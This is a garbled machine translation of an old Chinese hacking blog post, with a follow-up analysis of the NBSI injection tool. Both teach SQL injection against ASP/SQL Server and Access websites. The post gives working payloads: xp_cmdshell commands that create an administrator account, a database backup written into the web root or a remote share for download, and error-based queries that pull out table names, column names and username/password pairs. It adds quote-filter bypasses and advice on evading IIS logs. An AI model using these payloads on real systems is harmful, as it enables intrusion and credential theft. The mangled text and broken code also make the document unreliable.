absolute value of the number (used when guessing Chinese characters) Access: a between b and c SQLServer: a betWeen B And C action: Judgment A is bound between B and C In the third quarter, the Chinese processing method encounters the Chinese characters in the injecting. Some people want to fight back in a Chinese character. In fact, as long as you know Chinese coding, "Chinese phobia" can quickly overcome. Let's talk about a little common sense: Access, Chinese ASCII code may have a negative number, take out the negative of the negative, with ABS () to take the absolute value, the Chinese characters unchanged. In SQL Server, Chinese ASCII is positive, but since it is a two-bit encoding of Unicode, the ASCII code cannot be obtained using a function ascii (), and the function unicode () must be used to return the corresponding Chinese character with the nchar function. After understanding the two points above, if you think Chinese guess is actually almost the same as English? In addition to the function of use, it is important to pay attention to the specification, the method is no different. After reading the entry and advanced articles, it was no problem with the practice of cracking a general practice.
But if you can't touch the name of the table name, or the program author is filtered with some special characters, how can I improve the success rate of injection? How to improve the guess efficiency? Let everyone look down in the high-end. In the first quarter, use the system table to inject SQLServer database SQLServer is a powerful database system, which has a close relationship with the operating system, which brings great convenience to developers, but on the other hand, it provides the injection. A springboard, let's take a look at several specific examples: 1 http://site/url.asp? Id = 1; exec master "xp_cmdshell" net user name password / add "- semicolon; in SQLServer Indicates the two sentences before and after, - indicates that the following statement is a comment, so this statement will be divided into two sentences in SQL Server, first of the SELECT Id = 1 record, then execute the stored procedure XP_cmdshell, this storage process Used to call the system command, so use the net command to create a new user name, password is Password's Windows account, then: 2 http: //site/url.asp? Id = 1; exec master..xp_cmdshell "Net Localgroup name administrators / add "- Add the new account name to the administrator group, don't have to be used, you have already got the highest authority of the system! Of course, this method is only applicable to the case where the database is connected to the SA, otherwise, there is no permission to call XP_cmdshell. 3 http: //site/url.asp? Id = 1 and db_name ()> 0 There is a similar example and user> 0, the role is to get the connection user name, db_name () is another system variable, return it is Connected database name. 4 http://site/url.asp? Id = 1; Backup Database database name to disk = 'c: /inetpub/wwroot/1.db'; - This is quite awkward, from 3 to Database name, plus some IIS error exposed absolute path, back up the database back to the web directory, and use HTTP to complete the entire database over the entire download, all administrators and user passwords are unfair! When you don't know the absolute path, you can also back up the method of the network address (such as //202.96.xx.xx/share/1.db), but the success rate is not high. 5 http://site/url.asp? Id = 1 and (select top 1 name from sysobjects where xtype = 'u' and status> 0)> 0 said that sysobjects is the system table of SQL Server, stored all Table name, view, constraint, and other objects, Xtype = 'u' and status> 0, indicating the table name established by the user, the above statement is removed, the first table name is relatively small, so that the error message is exposed come out. Second, how to get the third table name? Still left to our smart readers.
6 http://site/url.asp? Id = 1 and (select top 1 col_name (object_id ('Name')> 0 After getting the table name from 5, use Object_ID ('Name " ') Get the internal ID, col_name (Name ID, 1) of the table name, represent the first field name of the table, change 1 to 2, 3, 4 ... You can get the specified sheet one by one. Field name. The above 6 points is that I have studied SQL Server injection of hardcore crystals, it can be seen that the degree of understanding of SQL Server directly affects success rate and guessing speed. After I study SQLServer injection, I also got a lot of improvement in development, huh, maybe safety and development was completed. In the second section, bypassing the program restrictions continue to inject in the entry section, there are many people like to use the 'number of injection vulnerabilities, so there are many people who use the filter' to "prevent" to inject vulnerabilities, this may block some entry Attack, but people who are more familiar with SQL, or can use the related functions to achieve the purpose of bypassing program restrictions. In the "SQL Injection" section, the statements I have use have been optimized, so that they do not include single quotes; in the "Using the System Table Inject into the SQLServer Database", some statements contain a 'number, We give an example to see how to transform these statements: Simple, such as WHERE XTYPE = 'u', the ASCII code corresponding to the character u is 85, so you can use where xtype = char (85) instead; if the character is Chinese, for example Where name = 'user', can be replaced with WHERE Name = nchar (29992) NCHAR (25143). Section III, experience summatation 1. Some people will filter these keywords, but forget the case of case sensation, so everyone can try it with Select. 2. When you can't guess the field name, you may wish to look at the login form on the website. Generally, the field name is the same name with the form of the form. 3. Special Note: The number incorporated in the address bar is interpreted as space, the% 2B is interpreted as number, and the% 25 is explained to the% number, and the specific introduction can be referred to URLENCode. 4. When injecting with GET method, IIS will record all your submission strings, do not record the POST method, so you can use the POST's URL to try not to use GET. 5. Instest the use of ASCII checking method, SQL Server can also use this method, only the difference between the two can only be exposed, but if the value of the error information can be exposed, that efficiency and Accuracy will have great improvements. The defense method SQL injection vulnerability can be described as "a thousand miles of embankment, collapsed in the ant hole", this vulnerability is extremely common online, usually because the programmer is not not understood, or the program is not strict, or a parameter is forgotten.
Here, I give you a function, instead of the Request function in the ASP, can inject the SAY NO to all SQL, the function is as follows: Function SafeRequest (PARANAME, PATYPE) '--- Incoming parameters ---' paraName: Parameter name - Character type 'paraType: Parameter type - Digital (1 means the above parameters are numbers, 0 means the above parameter is character) DIM ParaValue Paravalue = Request (paraName) if parates = 1 Then if not isnumeric (paravalue) Ten response.write " Parameters "& paraName &" must be digital! "Response.end end if else paravalue = replace (paravalue," '","' ") end if Saferequest = Paravalue End Function 2004-11-28 6:51 PM | Hnxyy does not understand 2004-11-30 2:48 PM | 111 don't understand ~ 2004-12-02 3:44 PM | Cornermoss looks unclear 2004-12-02 10:12 PM | zhuzhu http: // 666W.com/Art/731.htm NBSI Injection Analysis Tracking Report (MSSQL) Preface: Writing a good tool is not easy, writing an injection tool is not easy. This article system analyzes the catcher's test ideas by tracking NBSI's injection process. It is very helpful for handmade analysis. Carefully track the sprint results of NBSI are also a kind of appreciation for injection attacks. First we found an IT site for testing, the catalog of tests was just to track the sprouting ideas of NBSI, and did not have malicious destruction to the site! 1 Detection assumption of the injection point assumption The injection point is: http://www.xxx.com/zHURU.ASP? ID = 1 Then NBSI will first try this connection: http://www.xxx.com/zhuru.asp? ID = 1 And user% 2bchar (124)> 0 The first thing I don't understand why it is called a char (124), this value is actually a "|" symbol. Behind we will say. Of course, this IIS will report an error, return a 500 internal error number, maybe the author will use this as a basis. 3 Guess the decyclopedia tracking found that the authors complete a demonstration of a table name and the efficiency is indeed. Specific Name Guessing the code: and (Select Top 1 Cast) from (SELECT TOP 1 ID, Name from sysobjects where xtype = char (85) Order By ID) T ORDER BY ID DESC)> 0 See the red 1? This is the value of the table name of the data sheet! If it is the first table, of course, it is 1, if it is the first table, then this 1 is changed to 2, and so on. So how do we decide whether the table name has been guess? This simple, tracking discovery, as long as the table name value returned by the table name value X and X 1 table is the same indication. 5 Guess the column tracking discovery, the author has completed a demonstration of a table name with a sentence. Maybe this is the benefit of the MSSQL guess! Change the Access may also be a letter to a letter to guess.
Specific guess column name: AND (SELECT TOP 1 CAST (Name As Varchar (8000)) from (SELECT TOP 1 Colid, Name from syscolumns where id = Object_id (nchar (78)% 2BNCHAR (101)% 2BNCHAR (119)% 2BNCHAR (115)% 2BNCHAR (95)% 2BNCHAR (85)% 2BNCHAR (115)% 2BNCHAR (101)% 2BNCHAR (114)) ORDER BY Colid) T Order By Colid Desc)> 0 Seeing red 1? This means that we have to guess the sequence value of the column name. Replacing 2 means to guess the second column name. The way the judgment ends and the end of the judgment table name. Note: NCHAR (78)% 2BNCHAR (101)% 2BNCHAR (119)% 2BNCHAR (115)% 2BNCHAR (95)% 2BNCHAR (85)% 2BNCHAR (115)% 2BNCHAR (101)% 2BNCHAR (114) In order to spare The status of 'symbols, the author tries to connect the character string value of the table name. The above biography actually represents a string value of a table. The numbers in parentheses are the ASC code of the character. Example: If we have to guess the name name of XFileTd, we will use the Huie's plugin to convert it! See below: [IMG] http://666w.com/uploadimages/bugimage002.jpg [/ img] We get the following characters: nchar (78)% 2BNCHAR (66)% 2BNCHAR (69)% 2BNCHAR (6C) % 2BNCHAR (65)% 2BNCHAR (74)% 2BNCHAR (75) huh! Fast! 6 Take the data below to see how NBSI is guessing data, it should be "violent", let us look forward to how the cattle is how to violate. 1) Number of recorded numbers (select% 20cast (COUNT (1)% 20cast (COUNT (1)% 20AS% 20Varchar (8000))% 20% 20 [News_Style]% 20where% 201 = 1)> 0 where Red News_Style represents the table name we have to guery, where the author uses a commonly used tomato skill. After we get the field number, the field is an int type value, and he and 0 are compared to the type conversion error. In other words, the record will not automatically "recruit". If we implement it when we are compared to 0, we connect it to the char (97) // character A, then we get a string. When compared to zero, naturally, "record a number" A is coming. Now everyone knows why the first step is to add a "|" symbol! The mystery is unpredictable. 2) Get the value of the field to obtain the number of records, and then the value of the field is rumored. Fortunately, the author doesn't use a strange trick. Author's code: and (Select Top 1 Isnull (CAST ([Sname] As Varchar (8000)), Char (32))% 2bchar (124) from (SELECT TOP 9 SNAME FROM [News_Style] Where 1 = 1 Order By Sname) T Order By Sname Desc)> 0 Red News_Style I don't explain, it is to guess the data table name, green 9 means to obtain the value recorded by the 9th record of the SNAME field. Circular a few times, huh, huh! Data is in hand. Everyone pays attention to: char (124). Its purpose is to convert the data into a string type and then compare it with the int type, and then out of data.
The truth is as described above! This is why NBSI why NBSI has a value of "|" in the field. The author may be too lazy to handle it. :-) [img] http://666w.com/uploadImages/bugimage006.jpg [/ img]? There are "|" symbols later. 3) Guess the double data and N data, everyone may think that NBSI guessing data fields have a very fast speed, and tracking and analyzing, it is true. Suppose we have to guess the value of 2 fields of a table. So how should we write a code? The NBSI code is written in this way: the first step or 1) method is recorded. The second step is: AND (Select Top 1 Isnull (CAST ([Username] As Varchar (8000)), CHAR (32))% 2BCHAR (124)% 2Bisnull (Cast ([Password] as varchar (8000)), Char (32)) from (SELECT TOP 1 Username, Password from [news_user] where 1 = 1 Order by username, password) T ORDER BY UserName Desc, Password Desc)> 0 (Note | Symbols have 2 values) News_user is a table name, char (124) I don't explain it. Everyone can compare the statement of the cat and 2). I want to see how the authors have a variety of field values. If you are happy, it doesn't matter if you have the value of the database. An indirect reminder, everyone: the value of the value of the violent network, the network overhead of the violence is not much, when playing NBSI, I remember to hang all the values! J Summary: Friends who wish to complete their VB code may write programs based on our analysis, you will have your own NBSI. Today's huie has such a function. I hope everyone will go to www.hack0.net access. Starting: The most important thing to write procedures is programming ideas, maybe you see some of the details of a good program. Do you have nothing to think, how is the NBSI to determine if the website is injected? In fact, it is just a thinking of SQL. The two ideas that NBSI show us are: 2 Judging the IIS's header is based on normal return 200, 101, if returns 500, indicates an error. 3 Take word word verification IIS's return information, then compare the possibility of injection! (Because some html information returned by some websites is very big! Judging the program is still spent, not recommended) more things, in fact, we still need to learn. Not only is a blizzard, inject injection. NBSI is actually a large software software, our analysis is completed in a state where IIS's error prompt is turned on. And it is used by the "digital" injection method. The limit is a bit, we will continue to track to completely explore NBSI injection ideas. The judgment of Access Injection may be an unnamed programming item. Change it is you, can you write it out? There are still many places where NBSI is not perfect, I have seen our article. Maybe you have a way to write a more cattle NB. Interested friends can continue to pay attention to our NBSI analysis report. More popular people can send their own network small plugs to www.hack0.net! PS: For the introduction of Huie and Huie plugins, please query www.hack0.net. A more detailed discussion can speak to the forum of www.hackerxfiles.net.
